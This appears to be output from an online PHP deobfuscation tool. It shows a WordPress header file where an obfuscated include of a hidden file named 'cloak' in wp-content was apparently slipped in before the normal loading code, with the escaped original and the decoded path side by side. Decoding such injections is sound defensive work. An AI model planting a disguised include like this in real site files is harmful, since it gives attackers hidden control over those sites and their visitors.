Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Loads the WordPress environment and template. * * @package WordPress ..

Decoded Output download

<?php 
/** 
 * Loads the WordPress environment and template. 
 * 
 * @package WordPress 
 */ 
include "/home/entrepreneur/public_html/wp-content/ewww/cloak"; 
if ( ! isset( $wp_did_header ) ) { 
 
	$wp_did_header = true; 
 
	// Load the WordPress library. 
	require_once __DIR__ . '/wp-load.php'; 
 
	// Set up the WordPress query. 
	wp(); 
 
	// Load the theme template. 
	require_once ABSPATH . WPINC . '/template-loader.php'; 
 
} ?>

Did this file decode correctly?

Original Code

<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */
include "\57\x68\157\x6d\x65\x2f\x65\156\x74\162\x65\160\x72\145\156\145\165\x72\57\x70\165\142\x6c\x69\143\137\x68\x74\155\x6c\57\x77\160\55\143\x6f\x6e\164\x65\156\164\57\x65\167\167\x77\x2f\143\x6c\157\x61\x6b";
if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}

Function Calls

None

Variables

None

Stats

MD5 89d07be678a25a0f6cc2538de185fbf4
Eval Count 0
Decode Time 41 ms